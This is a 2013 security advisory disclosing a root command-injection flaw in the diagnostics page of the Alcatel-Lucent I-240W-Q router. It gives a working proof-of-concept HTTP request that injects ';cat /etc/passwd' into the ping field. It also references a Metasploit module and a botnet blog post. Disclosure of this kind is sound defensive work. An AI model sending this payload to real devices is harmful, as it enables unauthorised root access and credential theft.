Arbitrary Command Execution in Alcatel-Lucent I-240W-Q

Arbitrary Command Execution in Alcatel-Lucent I-240W-Q

Posted on Dec 19 2013   |  Plain text version

Summary

The ONT Alcatel-Lucent I-240W-Q is vulnerable to arbitrary command execution in the administrative web interface.

Description

Model: Alcatel Lucent I-240W-Q
Hardware version: 0068-5C-01
Software version: 3FE53862BOCA53
Publication date: 12/19/2013
Severity: High
Solution: N/A

The vulnerability is located in the administrative web interface under: Maintenance > Diagnostics. The IP Address value for the Ping and Traceroute commands are not properly filtered and therefore allow multiple system commands to be run through the use of the ";" character.

The commands run with root privileges.

POC



POST /GponForm/diag_XForm HTTP/1.1
Host: 192.168.1.254
Referer: http://192.168.1.254/diag.html
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=%3Bcat+%2Fetc%2Fpasswd

HTTP/0.9 200 OK


BLOG POST

Drive By ONT Botnet with IRC C&C

The blog post demonstrates the creation of a botnet using embedded devices which are controlled remotely through vulnerabilities exploited from a webpage.




METASPLOIT EXPLOIT

This MSF exploit was created by Luis Colunga to execute remote reverse TCP MIPS payloads by exploiting a command execution vulnerability found in the ONT Alcatel Lucent I-240W.

Download alcatel_i240w_exec.rb


Latest Blog Entries

Belkin Wemo Switch NMap Scripts
Belkin Wemo Switch Smart Plug is a network controlled power outlet. The current firmware version does not requiere authentication to switch the power ON or OFF or to gather information such as nearby wireless networks. Two NMap scripts have been published

Downloading an Application's Entire Source Code Through an Exposed GIT Directory
Website administrators sometimes inadvertently leave an exposed .git directory, from which it is possible to download the entire source code of the web application using just wget and a common server misconfiguration.

credmap: The Credential Mapper
An overview of credmap, an open source penetration testing tool that automates the process of testing for credential reuse. It does so by testing supplied user credentials on known websites and verifies if the password has been reused on any of these.

Latest News

Blackhat EU 2015
Websec participated with two tools at the Blackhat, EU Arsenal held in Amsterdam, NL from the 10-13 of November, 2015. During this event, we introduced our brand new tool "credmap: The Credential Mapper" and also presented an amped-up version of Panoptic.

BSides Vancouver 2015
Websec is proud to announce that we will be attending the 3rd annual edition of BSides Vancouver, a local non-profit information security conference held in the heart of Vancouver, BC on March 16 and 17.